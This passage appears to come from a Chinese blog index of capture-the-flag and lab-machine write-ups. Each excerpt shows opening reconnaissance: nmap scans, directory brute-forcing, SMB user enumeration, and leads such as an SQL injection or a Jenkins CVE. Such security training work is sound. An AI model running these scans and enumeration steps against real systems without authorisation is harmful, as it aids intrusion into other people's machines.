|   256 99:c8:74:31:45:10:58:b0:ce:cc:63:b4:7a:82:57:3d (ECDSA)
|_  256 60:da:3e:31:38:fa:b5:49:ab:48:c3:43:2c:9f:d1:32 (ED25519)
|_auth-owners: root
80/tcp  open  http    Apache httpd 2.4.56 ((Debian))
|_http-server-header: Apache/2.4.56 (Debian)
|_http-title: Apache2 Debian Default Page: It works
113/tcp open  ident?
|_auth-owners: lucifer
MAC Address: 08:00:27:DE:A3:91 (Oracle VirtualBox virtual NIC)
Device type: general purpose
Running: Linux 4.X|5.X
OS CPE: cpe:/o:linux:linux_kernel:4 cpe:/o:linux:linux_kernel:5
OS details: Linux 4.15 - 5.8
Network Distance: 1 hop
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

从113端口上扫描到一个用户名：lucifer

VulnVM-Entropy

Thu, 13 Mar 2025 00:00:00 +0000

Box Info

OS	Linux
Difficulty	Medium

Nmap

[root@kali] /home/kali/Entropy  
❯ nmap 192.168.56.117 -sV -A -p- 

PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 9.2p1 Debian 2+deb12u5 (protocol 2.0)
| ssh-hostkey: 
|   256 cc:05:ab:8c:ea:28:eb:b1:9d:da:8c:ce:65:ee:63:43 (ECDSA)
|_  256 3f:9f:0a:7d:61:f8:6f:4b:46:01:c4:db:74:b2:b6:a7 (ED25519)
80/tcp open  http    Apache httpd 2.4.62 ((Debian))
|_http-server-header: Apache/2.4.62 (Debian)
|_http-title: Apache2 Debian Default Page: It works

目录扫描没有任何结果，在apache默认页中发现路径

HackMyVM-SingDanceRap

Wed, 12 Mar 2025 00:00:00 +0000

Box Info

OS	Linux
Difficulty	Hard

Nmap

[root@kali] /home/kali  
❯ nmap 192.168.56.116 -sV -A -p-

PORT      STATE    SERVICE VERSION
22/tcp    open     ssh     OpenSSH 7.9p1 Debian 10+deb10u4 (protocol 2.0)
| ssh-hostkey: 
|   2048 5d:41:2a:c1:2d:3b:6c:78:b3:af:ae:9d:42:fe:88:b8 (RSA)
|   256 3c:e9:64:eb:84:fe:5c:83:94:07:27:6c:12:14:c8:4c (ECDSA)
|_  256 09:9b:2b:18:de:6c:6d:f8:8b:15:df:6c:0f:c0:7c:b2 (ED25519)
80/tcp    open     http    Apache httpd 2.4.59 ((Debian))
|_http-server-header: Apache/2.4.59 (Debian)
|_http-title: News Website
65000/tcp filtered unknown

Gobuster

[root@kali] /home/kali  
❯ gobuster dir -u http://192.168.56.116/ -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -t 50  -x php,html,txt
===============================================================
Gobuster v3.6
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:                     http://192.168.56.116/
[+] Method:                  GET
[+] Threads:                 50
[+] Wordlist:                /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
[+] Negative Status codes:   404
[+] User Agent:              gobuster/3.6
[+] Extensions:              php,html,txt
[+] Timeout:                 10s
===============================================================
Starting gobuster in directory enumeration mode
===============================================================
/.php                 (Status: 403) [Size: 279]
/index.html           (Status: 200) [Size: 3118]
/news.php             (Status: 200) [Size: 1301]
/.html                (Status: 403) [Size: 279]
/.php                 (Status: 403) [Size: 279]
/.html                (Status: 403) [Size: 279]
/littlesecrets        (Status: 301) [Size: 324] [--> http://192.168.56.116/littlesecrets/]
/server-status        (Status: 403) [Size: 279]
Progress: 882240 / 882244 (100.00%)
===============================================================
Finished
===============================================================

针对这个**/littlesecrets**再次进行扫描

picoCTF 2025

Wed, 12 Mar 2025 00:00:00 +0000

Web

任意登录后发现Cookie字段

进行URL解码和Base64解码

head-dump

在网页源码中发现一个**/api-docs**路由

进入之后执行一下**/heapdump**的GET方法，发现响应的是一个下载链接

VulnVM-Solitude

Tue, 11 Mar 2025 00:00:00 +0000

Box Info

OS	Linux
Difficulty	Easy

Nmap

[root@kali] /home/kali/Solitude  
❯ nmap 192.168.56.115 -sV -A -p- 

PORT    STATE SERVICE     VERSION
22/tcp  open  ssh         OpenSSH 8.2p1 Ubuntu 4ubuntu0.11 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   3072 2b:c7:6c:06:c7:80:41:bc:cb:dc:fe:d6:e8:85:db:b0 (RSA)
|   256 61:d1:67:f9:8f:99:62:9b:d4:9a:70:19:ff:78:bd:77 (ECDSA)
|_  256 2b:6e:53:ab:ac:68:ca:78:a7:d6:2f:34:65:e8:5d:17 (ED25519)
80/tcp  open  http        Apache httpd 2.4.41 ((Ubuntu))
|_http-server-header: Apache/2.4.41 (Ubuntu)
|_http-title: Apache2 Ubuntu Default Page: It works
139/tcp open  netbios-ssn Samba smbd 4.6.2
445/tcp open  netbios-ssn Samba smbd 4.6.2
MAC Address: 08:00:27:22:A4:A8 (Oracle VirtualBox virtual NIC)
Device type: general purpose
Running: Linux 4.X|5.X
OS CPE: cpe:/o:linux:linux_kernel:4 cpe:/o:linux:linux_kernel:5
OS details: Linux 4.15 - 5.8
Network Distance: 1 hop
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Host script results:
| smb2-security-mode: 
|   3:1:1: 
|_    Message signing enabled but not required
| smb2-time: 
|   date: 2025-03-11T20:26:05
|_  start_date: N/A
|_nbstat: NetBIOS name: SOLITUDE, NetBIOS user: <unknown>, NetBIOS MAC: <unknown> (unknown)
|_clock-skew: 7h59m57s

Enum4linux

[root@kali] /home/kali/Solitude  
❯ enum4linux -a 192.168.56.115

[+] Enumerating users using SID S-1-22-1 and logon username '', password ''                                                          
                                                                                                                                     
S-1-22-1-1000 Unix User\garret (Local User)

找到一个用户名：garret

VulNyx-Change

Tue, 11 Mar 2025 00:00:00 +0000

Box Info

OS	Windows
Difficulty	Medium

Nmap

[root@kali] /home/kali  
❯ nmap 192.168.56.114 -sV -A -p- ⏎

PORT      STATE SERVICE       VERSION
53/tcp    open  domain        Simple DNS Plus
88/tcp    open  kerberos-sec  Microsoft Windows Kerberos (server time: 2025-03-11 02:36:46Z)
135/tcp   open  msrpc         Microsoft Windows RPC
139/tcp   open  netbios-ssn   Microsoft Windows netbios-ssn
389/tcp   open  ldap          Microsoft Windows Active Directory LDAP (Domain: megachange.nyx0., Site: Default-First-Site-Name)
445/tcp   open  microsoft-ds?
464/tcp   open  kpasswd5?
593/tcp   open  ncacn_http    Microsoft Windows RPC over HTTP 1.0
636/tcp   open  tcpwrapped
3268/tcp  open  ldap          Microsoft Windows Active Directory LDAP (Domain: megachange.nyx0., Site: Default-First-Site-Name)
3269/tcp  open  tcpwrapped
5985/tcp  open  http          Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-title: Not Found
|_http-server-header: Microsoft-HTTPAPI/2.0
9389/tcp  open  mc-nmf        .NET Message Framing
47001/tcp open  http          Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-title: Not Found
|_http-server-header: Microsoft-HTTPAPI/2.0
49664/tcp open  msrpc         Microsoft Windows RPC
49665/tcp open  msrpc         Microsoft Windows RPC
49666/tcp open  msrpc         Microsoft Windows RPC
49667/tcp open  msrpc         Microsoft Windows RPC
49669/tcp open  msrpc         Microsoft Windows RPC
49670/tcp open  ncacn_http    Microsoft Windows RPC over HTTP 1.0
49671/tcp open  msrpc         Microsoft Windows RPC
49674/tcp open  msrpc         Microsoft Windows RPC
49675/tcp open  msrpc         Microsoft Windows RPC
49680/tcp open  msrpc         Microsoft Windows RPC
49697/tcp open  msrpc         Microsoft Windows RPC
MAC Address: 08:00:27:DD:48:CA (Oracle VirtualBox virtual NIC)
Device type: general purpose
Running: Microsoft Windows 2019
OS details: Microsoft Windows Server 2019
Network Distance: 1 hop
Service Info: Host: CHANGE; OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
| smb2-security-mode: 
|   3:1:1: 
|_    Message signing enabled and required
|_clock-skew: 15h59m57s
|_nbstat: NetBIOS name: CHANGE, NetBIOS user: <unknown>, NetBIOS MAC: 08:00:27:dd:48:ca (Oracle VirtualBox virtual NIC)
| smb2-time: 
|   date: 2025-03-11T02:37:41
|_  start_date: N/A

把megachange.nyx添加到**/etc/hosts**

HackMyVM-Matrioshka

Mon, 10 Mar 2025 00:00:00 +0000

Box Info

OS	Linux
Difficulty	Medium

Nmap

[root@kali] /home/kali/Matrioshka  
❯ nmap 192.168.56.108 -sV -A -p- -T4                     

PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 9.2p1 Debian 2+deb12u3 (protocol 2.0)
| ssh-hostkey: 
|   256 b5:a4:7c:65:5c:1f:d7:89:42:bd:76:df:2c:8e:93:4e (ECDSA)
|_  256 5d:3d:2b:43:fc:89:fa:24:a3:f4:73:5f:7b:89:6c:e3 (ED25519)
80/tcp open  http    Apache httpd 2.4.61 ((Debian))
|_http-server-header: Apache/2.4.61 (Debian)
|_http-title: mamushka
MAC Address: 08:00:27:D5:7C:4C (Oracle VirtualBox virtual NIC)
Device type: general purpose
Running: Linux 5.X
OS CPE: cpe:/o:linux:linux_kernel:5
OS details: Linux 5.0 - 5.5
Network Distance: 1 hop
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

将mamushka.hmv添加到**/etc/hosts**

VulNyx-Lower3

Mon, 10 Mar 2025 00:00:00 +0000

Box Info

OS	Linux
Difficulty	Low

Nmap

[root@kali] /home/kali/Lower3  
❯ nmap 192.168.56.113 -sV -A -p- 

PORT      STATE SERVICE  VERSION
22/tcp    open  ssh      OpenSSH 8.4p1 Debian 5+deb11u1 (protocol 2.0)
| ssh-hostkey: 
|   3072 f0:e6:24:fb:9e:b0:7a:1a:bd:f7:b1:85:23:7f:b1:6f (RSA)
|   256 99:c8:74:31:45:10:58:b0:ce:cc:63:b4:7a:82:57:3d (ECDSA)
|_  256 60:da:3e:31:38:fa:b5:49:ab:48:c3:43:2c:9f:d1:32 (ED25519)
80/tcp    open  http     Apache httpd 2.4.56 ((Debian))
|_http-title: Apache2 Debian Default Page: It works
|_http-server-header: Apache/2.4.56 (Debian)
111/tcp   open  rpcbind  2-4 (RPC #100000)
| rpcinfo: 
|   program version    port/proto  service
|   100000  2,3,4        111/tcp   rpcbind
|   100000  2,3,4        111/udp   rpcbind
|   100000  3,4          111/tcp6  rpcbind
|   100000  3,4          111/udp6  rpcbind
|   100003  3           2049/udp   nfs
|   100003  3           2049/udp6  nfs
|   100003  3,4         2049/tcp   nfs
|   100003  3,4         2049/tcp6  nfs
|   100005  1,2,3      36141/tcp   mountd
|   100005  1,2,3      46793/udp   mountd
|   100005  1,2,3      56285/tcp6  mountd
|   100005  1,2,3      57285/udp6  mountd
|   100021  1,3,4      37329/tcp6  nlockmgr
|   100021  1,3,4      39713/tcp   nlockmgr
|   100021  1,3,4      41715/udp   nlockmgr
|   100021  1,3,4      58173/udp6  nlockmgr
|   100227  3           2049/tcp   nfs_acl
|   100227  3           2049/tcp6  nfs_acl
|   100227  3           2049/udp   nfs_acl
|_  100227  3           2049/udp6  nfs_acl
2049/tcp  open  nfs      3-4 (RPC #100003)
36141/tcp open  mountd   1-3 (RPC #100005)
38315/tcp open  mountd   1-3 (RPC #100005)
39713/tcp open  nlockmgr 1-4 (RPC #100021)
41871/tcp open  mountd   1-3 (RPC #100005)
MAC Address: 08:00:27:C5:C6:B4 (Oracle VirtualBox virtual NIC)
Device type: general purpose
Running: Linux 4.X|5.X
OS CPE: cpe:/o:linux:linux_kernel:4 cpe:/o:linux:linux_kernel:5
OS details: Linux 4.15 - 5.8
Network Distance: 1 hop
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

NFS

发现了 NFS（Network File System） 共享，可能存在可挂载的远程文件系统。 mountd、nlockmgr、nfs_acl 这些 RPC 端口也被发现，表明服务器可能允许远程文件访问。

HackMyVM-Newbee

Sun, 09 Mar 2025 00:00:00 +0000

Box Info

OS	Linux
Difficulty	Easy

Nmap

[root@kali] /home/kali/debian  
❯ nmap 192.168.237.155 -sV -A -p- -T4

PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 9.2p1 Debian 2+deb12u5 (protocol 2.0)
| ssh-hostkey: 
|   256 92:6e:6d:b0:bd:08:1e:db:9d:56:0e:f8:15:25:ca:21 (ECDSA)
|_  256 88:d7:08:bd:a2:95:75:cc:71:06:47:ae:fd:d3:8b:b9 (ED25519)
80/tcp open  http    Apache httpd 2.4.62 ((Debian))
|_http-server-header: Apache/2.4.62 (Debian)
|_http-title: PHPJabbers.com | Free Food Store Website Template
MAC Address: 00:0C:29:0A:FF:81 (VMware)
Device type: general purpose
Running: Linux 4.X|5.X
OS CPE: cpe:/o:linux:linux_kernel:4 cpe:/o:linux:linux_kernel:5
OS details: Linux 4.15 - 5.8
Network Distance: 1 hop
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

ParamScan

访问80端口，在网页注释中发现存在GET参数

HTB-Dog

Sun, 09 Mar 2025 00:00:00 +0000

Box Info

OS	Linux
Difficulty	Easy

Nmap

[root@kali] /home/kali/Dog  
❯ nmap dog.htb -sV -A -Pn -T4        

PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 8.2p1 Ubuntu 4ubuntu0.12 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   3072 97:2a:d2:2c:89:8a:d3:ed:4d:ac:00:d2:1e:87:49:a7 (RSA)
|   256 27:7c:3c:eb:0f:26:e9:62:59:0f:0f:b1:38:c9:ae:2b (ECDSA)
|_  256 93:88:47:4c:69:af:72:16:09:4c:ba:77:1e:3b:3b:eb (ED25519)
80/tcp open  http    Apache httpd 2.4.41 ((Ubuntu))
| http-git: 
|   10.10.11.58:80/.git/
|     Git repository found!
|     Repository description: Unnamed repository; edit this file 'description' to name the...
|_    Last commit message: todo: customize url aliases.  reference:https://docs.backdro...
|_http-server-header: Apache/2.4.41 (Ubuntu)
|_http-generator: Backdrop CMS 1 (https://backdropcms.org)
| http-robots.txt: 22 disallowed entries (15 shown)
| /core/ /profiles/ /README.md /web.config /admin 
| /comment/reply /filter/tips /node/add /search /user/register 
|_/user/password /user/login /user/logout /?q=admin /?q=comment/reply
|_http-title: Home | Dog

可以发现nmap直接扫描到了**/.git**目录

HackMyVm-easypwn

Fri, 07 Mar 2025 00:00:00 +0000

Box Info

OS	Linux
Difficulty	Medium

Nmap

[root@kali] /home/kali  
❯ nmap 192.168.56.105 -sV -A -Pn -T4 -p-
Starting Nmap 7.94SVN ( https://nmap.org ) at 2025-03-03 14:36 CST
Nmap scan report for 192.168.56.105
Host is up (0.00024s latency).
Not shown: 65532 closed tcp ports (reset)
PORT     STATE SERVICE VERSION
22/tcp   open  ssh     OpenSSH 7.9p1 Debian 10+deb10u2 (protocol 2.0)
| ssh-hostkey: 
|   2048 93:a4:92:55:72:2b:9b:4a:52:66:5c:af:a9:83:3c:fd (RSA)
|   256 1e:a7:44:0b:2c:1b:0d:77:83:df:1d:9f:0e:30:08:4d (ECDSA)
|_  256 d0:fa:9d:76:77:42:6f:91:d3:bd:b5:44:72:a7:c9:71 (ED25519)
80/tcp   open  http    Apache httpd 2.4.59 ((Debian))
|_http-title: Don't Hack Me
|_http-server-header: Apache/2.4.59 (Debian)
6666/tcp open  irc?
| fingerprint-strings: 
|   Help, Socks4, Socks5: 
|     Hackers, get out of my machine
|   beast2: 
|_    start: 11
|_irc-info: Unable to open connection

6666端口只能用nc连接，进入80端口发现需要扫描目录

VulnVM-Ephermeral2

Fri, 07 Mar 2025 00:00:00 +0000

Box Info

OS	Linux
Difficulty	Medium

Nmap

[root@kali] /home/kali/Ephemeral2  
❯ nmap 192.168.56.107 -sV -A -p- 

PORT    STATE SERVICE     VERSION
22/tcp  open  ssh         OpenSSH 8.2p1 Ubuntu 4ubuntu0.4 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   3072 0a:cc:f1:53:7e:6b:31:2c:10:1e:6d:bc:01:b1:c3:a2 (RSA)
|   256 cd:19:04:a0:d1:8a:8b:3d:3e:17:ee:21:5d:cd:6e:49 (ECDSA)
|_  256 e5:6a:27:39:ed:a8:c9:03:46:f2:a5:8c:87:85:44:9e (ED25519)
80/tcp  open  http        Apache httpd 2.4.41 ((Ubuntu))
|_http-title: Apache2 Ubuntu Default Page: It works
|_http-server-header: Apache/2.4.41 (Ubuntu)
139/tcp open  netbios-ssn Samba smbd 4.6.2
445/tcp open  netbios-ssn Samba smbd 4.6.2
MAC Address: 08:00:27:47:B9:0F (Oracle VirtualBox virtual NIC)
Device type: general purpose
Running: Linux 4.X|5.X
OS CPE: cpe:/o:linux:linux_kernel:4 cpe:/o:linux:linux_kernel:5
OS details: Linux 4.15 - 5.8
Network Distance: 1 hop
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Host script results:
| smb2-security-mode: 
|   3:1:1: 
|_    Message signing enabled but not required
|_nbstat: NetBIOS name: EPHEMERAL, NetBIOS user: <unknown>, NetBIOS MAC: <unknown> (unknown)
| smb2-time: 
|   date: 2025-03-07T16:30:22
|_  start_date: N/A
|_clock-skew: 7h59m57s

Gobuster

[root@kali] /home/kali/Ephemeral2  
❯ gobuster dir -u http://192.168.56.107 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -t 50                                                                                                ⏎
===============================================================
Gobuster v3.6
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:                     http://192.168.56.107
[+] Method:                  GET
[+] Threads:                 50
[+] Wordlist:                /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
[+] Negative Status codes:   404
[+] User Agent:              gobuster/3.6
[+] Timeout:                 10s
===============================================================
Starting gobuster in directory enumeration mode
===============================================================
/javascript           (Status: 301) [Size: 321] [--> http://192.168.56.107/javascript/]
/server-status        (Status: 403) [Size: 279]
/foodservice          (Status: 301) [Size: 322] [--> http://192.168.56.107/foodservice/]
Progress: 220560 / 220561 (100.00%)
===============================================================
Finished
===============================================================

存在一个**/foodservice**页面

VulnVM-Backend

Wed, 05 Mar 2025 00:00:00 +0000

Box Info

OS	Linux
Difficulty	Medium

Nmap

[root@kali] /home/kali/Backend  
❯ nmap 192.168.237.148 -sV -A -p- 

PORT     STATE SERVICE VERSION
22/tcp   open  ssh     OpenSSH 8.2p1 Ubuntu 4ubuntu0.11 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   3072 48:ec:8d:c2:a6:1e:52:43:62:44:29:36:58:73:15:6b (RSA)
|   256 0d:39:f5:86:a1:fc:7d:ba:c6:55:14:37:2c:91:fe:37 (ECDSA)
|_  256 d6:91:b0:62:48:85:9c:51:dd:f9:20:35:d2:53:a6:25 (ED25519)
8080/tcp open  http    Jetty 10.0.18
|_http-title: Site doesn't have a title (text/html;charset=utf-8).
| http-robots.txt: 1 disallowed entry 
|_/
|_http-server-header: Jetty(10.0.18)
MAC Address: 00:0C:29:42:20:88 (VMware)
Device type: general purpose
Running: Linux 4.X|5.X
OS CPE: cpe:/o:linux:linux_kernel:4 cpe:/o:linux:linux_kernel:5
OS details: Linux 4.15 - 5.8
Network Distance: 1 hop
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

CVE-2024-23897

进入8080端口发现是一个Jenkins的登录页面

Dockerlabs-predictable

Tue, 04 Mar 2025 00:00:00 +0000

Box Info

OS	Linux
Difficulty	Hard

Nmap

不知道为什么扫得很慢，这里就简略一点

[root@kali] /home/kali/predictable  
❯ nmap 172.17.0.2 -p- 

PORT     STATE SERVICE
22/tcp   open  ssh
1111/tcp open  lmsocialserver

Crack Number

访问1111端口，在源代码中得到信息

似乎是这个随机数列表的生成逻辑

HackMyVm-DC02

Mon, 03 Mar 2025 00:00:00 +0000

Box Info

OS	Windows
Difficulty	Medium

Nmap

[root@kali] /home/kali  
❯ nmap 192.168.56.126 -sV -Pn -T4  
Starting Nmap 7.94SVN ( https://nmap.org ) at 2025-03-02 18:44 CST
Nmap scan report for 192.168.56.126
Host is up (0.00028s latency).
Not shown: 989 filtered tcp ports (no-response)
PORT     STATE SERVICE       VERSION
53/tcp   open  domain        Simple DNS Plus
88/tcp   open  kerberos-sec  Microsoft Windows Kerberos (server time: 2025-03-02 23:47:04Z)
135/tcp  open  msrpc         Microsoft Windows RPC
139/tcp  open  netbios-ssn   Microsoft Windows netbios-ssn
389/tcp  open  ldap          Microsoft Windows Active Directory LDAP (Domain: SOUPEDECODE.LOCAL0., Site: Default-First-Site-Name)
445/tcp  open  microsoft-ds?
464/tcp  open  kpasswd5?
593/tcp  open  ncacn_http    Microsoft Windows RPC over HTTP 1.0
636/tcp  open  tcpwrapped
3268/tcp open  ldap          Microsoft Windows Active Directory LDAP (Domain: SOUPEDECODE.LOCAL0., Site: Default-First-Site-Name)
3269/tcp open  tcpwrapped
MAC Address: 08:00:27:4E:CF:21 (Oracle VirtualBox virtual NIC)
Service Info: Host: DC01; OS: Windows; CPE: cpe:/o:microsoft:windows

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 12.84 seconds

把SOUPEDECODE.LOCAL、DC01.SOUPEDECODE.LOCAL添加到**/etc/hosts**

HTB-Cypher

Sun, 02 Mar 2025 00:00:00 +0000

Box Info

OS	Linux
Difficulty	Medium

Nmap

[root@kali] /home/kali/Cypher  
❯ nmap cypher.htb -sV -A -T4 

PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 9.6p1 Ubuntu 3ubuntu13.8 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   256 be:68:db:82:8e:63:32:45:54:46:b7:08:7b:3b:52:b0 (ECDSA)
|_  256 e5:5b:34:f5:54:43:93:f8:7e:b6:69:4c:ac:d6:3d:23 (ED25519)
80/tcp open  http    nginx 1.24.0 (Ubuntu)
|_http-title: GRAPH ASM
|_http-server-header: nginx/1.24.0 (Ubuntu)

Dirsearch

[root@kali] /home/kali/Desktop  
❯ dirsearch -u cypher.htb -t 50 -x 404

Target: http://cypher.htb/

Starting:                                                                                                                                        
200 - 5KB - /about                                            
200 - 5KB - /about.html                                       
307 - 0B  - /api  ->  /api/docs                               
307 - 0B  - /api/  ->  http://cypher.htb/api/api              
307 - 0B  - /demo/  ->  http://cypher.htb/api/demo            
307 - 0B  - /demo  ->  /login                                 
200 - 4KB - /login.html                                       
200 - 4KB - /login                                            
301 - 178B  - /testing  ->  http://cypher.htb/testing/          
                                                                             
Task Completed

Dockerlabs-Crackoff

Sat, 01 Mar 2025 00:00:00 +0000

Box Info

OS	Linux
Difficulty	Hard

Nmap

[root@kali] /home/kali/crackoff  
❯ nmap 172.17.0.2 -sV  -A -p-
Starting Nmap 7.94SVN ( https://nmap.org ) at 2025-02-28 21:28 CST
Nmap scan report for sitio.dl (172.17.0.2)
Host is up (0.00010s latency).
Not shown: 65533 closed tcp ports (reset)
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 9.6p1 Ubuntu 3ubuntu13.4 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   256 3d:fc:bd:41:cb:81:e8:cd:a2:58:5a:78:68:2b:a3:04 (ECDSA)
|_  256 d8:5a:63:27:60:35:20:30:a9:ec:25:36:9e:50:06:8d (ED25519)
80/tcp open  http    Apache httpd 2.4.58 ((Ubuntu))
|_http-server-header: Apache/2.4.58 (Ubuntu)
|_http-title: CrackOff - Bienvenido
MAC Address: 02:42:AC:11:00:02 (Unknown)
Device type: general purpose
Running: Linux 4.X|5.X
OS CPE: cpe:/o:linux:linux_kernel:4 cpe:/o:linux:linux_kernel:5
OS details: Linux 4.15 - 5.8
Network Distance: 1 hop
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

TRACEROUTE
HOP RTT     ADDRESS
1   0.10 ms sitio.dl (172.17.0.2)

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 8.67 seconds

Gobuster

[root@kali] /home/kali/crackoff  
❯ gobuster dir -u http://172.17.0.2/ -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt  -x php
===============================================================
Gobuster v3.6
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:                     http://172.17.0.2/
[+] Method:                  GET
[+] Threads:                 10
[+] Wordlist:                /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
[+] Negative Status codes:   404
[+] User Agent:              gobuster/3.6
[+] Extensions:              php
[+] Timeout:                 10s
===============================================================
Starting gobuster in directory enumeration mode
===============================================================
/.php                 (Status: 403) [Size: 275]
/index.php            (Status: 200) [Size: 2974]
/login.php            (Status: 200) [Size: 3968]
/welcome.php          (Status: 200) [Size: 2800]
/db.php               (Status: 302) [Size: 75] [--> error.php]
/error.php            (Status: 200) [Size: 2705]
/.php                 (Status: 403) [Size: 275]
/server-status        (Status: 403) [Size: 275]
Progress: 441120 / 441122 (100.00%)
===============================================================
Finished
===============================================================

SQL Injection

进入login.php，发现在username字段中存在SQL注入漏洞，单引号闭合

Dockerlabs-r00tless

Sat, 01 Mar 2025 00:00:00 +0000

Box Info

OS	Linux
Difficulty	Hard

Nmap

[root@kali] /home/kali/r00tless  
❯ nmap 172.18.0.2 -sV  -A -p-
Starting Nmap 7.94SVN ( https://nmap.org ) at 2025-03-01 11:27 CST
Nmap scan report for 172.18.0.2
Host is up (0.000092s latency).
Not shown: 65531 closed tcp ports (reset)
PORT    STATE SERVICE     VERSION
22/tcp  open  ssh         OpenSSH 9.6p1 Ubuntu 3ubuntu13.5 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   256 fa:7b:d3:96:f6:83:bb:bd:24:86:b4:a8:f6:59:c3:62 (ECDSA)
|_  256 29:49:38:ae:44:75:d8:88:2a:b6:98:55:00:bd:24:76 (ED25519)
80/tcp  open  http        Apache httpd 2.4.58 ((Ubuntu))
|_http-server-header: Apache/2.4.58 (Ubuntu)
|_http-title: Subir Archivo
139/tcp open  netbios-ssn Samba smbd 4.6.2
445/tcp open  netbios-ssn Samba smbd 4.6.2
MAC Address: 02:42:AC:12:00:02 (Unknown)
Device type: general purpose
Running: Linux 4.X|5.X
OS CPE: cpe:/o:linux:linux_kernel:4 cpe:/o:linux:linux_kernel:5
OS details: Linux 4.15 - 5.8
Network Distance: 1 hop
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Host script results:
| smb2-security-mode: 
|   3:1:1: 
|_    Message signing enabled but not required
| smb2-time: 
|   date: 2025-03-01T03:27:48
|_  start_date: N/A

TRACEROUTE
HOP RTT     ADDRESS
1   0.09 ms 172.18.0.2

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 20.77 seconds

Gobuster

[root@kali] /home/kali/r00tless  
❯ gobuster dir -u http://172.18.0.2 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt  -x php,txt,html
===============================================================
Gobuster v3.6
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:                     http://172.18.0.2
[+] Method:                  GET
[+] Threads:                 10
[+] Wordlist:                /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
[+] Negative Status codes:   404
[+] User Agent:              gobuster/3.6
[+] Extensions:              php,txt,html
[+] Timeout:                 10s
===============================================================
Starting gobuster in directory enumeration mode
===============================================================
/.html                (Status: 403) [Size: 275]
/index.html           (Status: 200) [Size: 2410]
/.php                 (Status: 403) [Size: 275]
/upload.php           (Status: 200) [Size: 56]
/readme.txt           (Status: 200) [Size: 78]
/.php                 (Status: 403) [Size: 275]
/.html                (Status: 403) [Size: 275]
/server-status        (Status: 403) [Size: 275]
Progress: 882240 / 882244 (100.00%)
===============================================================
Finished
===============================================================

Own passsamba

HackMyVM-DC03

Sat, 01 Mar 2025 00:00:00 +0000

Box Info

OS	Windows
Difficulty	Medium

Nmap

[root@kali] /home/kali/Desktop  
❯ nmap 192.168.56.103 -sSV -Pn -A -T4

PORT     STATE SERVICE       VERSION
53/tcp   open  domain?
88/tcp   open  kerberos-sec  Microsoft Windows Kerberos (server time: 2025-03-02 03:01:34Z)
135/tcp  open  msrpc         Microsoft Windows RPC
139/tcp  open  netbios-ssn   Microsoft Windows netbios-ssn
389/tcp  open  ldap          Microsoft Windows Active Directory LDAP (Domain: SOUPEDECODE.LOCAL0., Site: Default-First-Site-Name)
445/tcp  open  microsoft-ds?
464/tcp  open  kpasswd5?
593/tcp  open  ncacn_http    Microsoft Windows RPC over HTTP 1.0
636/tcp  open  tcpwrapped
3268/tcp open  ldap          Microsoft Windows Active Directory LDAP (Domain: SOUPEDECODE.LOCAL0., Site: Default-First-Site-Name)
3269/tcp open  tcpwrapped
MAC Address: 08:00:27:46:72:D1 (Oracle VirtualBox virtual NIC)
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose
Running (JUST GUESSING): Microsoft Windows 2022|11|2016 (97%)
OS CPE: cpe:/o:microsoft:windows_server_2016
Aggressive OS guesses: Microsoft Windows Server 2022 (97%), Microsoft Windows 11 21H2 (91%), Microsoft Windows Server 2016 (91%)
No exact OS matches for host (test conditions non-ideal).
Network Distance: 1 hop
Service Info: Host: DC01; OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
| smb2-security-mode: 
|   3:1:1: 
|_    Message signing enabled and required
|_clock-skew: 14h59m36s
| smb2-time: 
|   date: 2025-03-02T03:03:53
|_  start_date: N/A
|_nbstat: NetBIOS name: DC01, NetBIOS user: <unknown>, NetBIOS MAC: 08:00:27:46:72:d1 (Oracle VirtualBox virtual NIC)

把DC01.SOUPEDECODE.LOCAL添加到**/etc/hosts**

Dockerlabs-Inclusion

Fri, 28 Feb 2025 00:00:00 +0000

Box Info

OS	Linux
Difficulty	Medium

Nmap

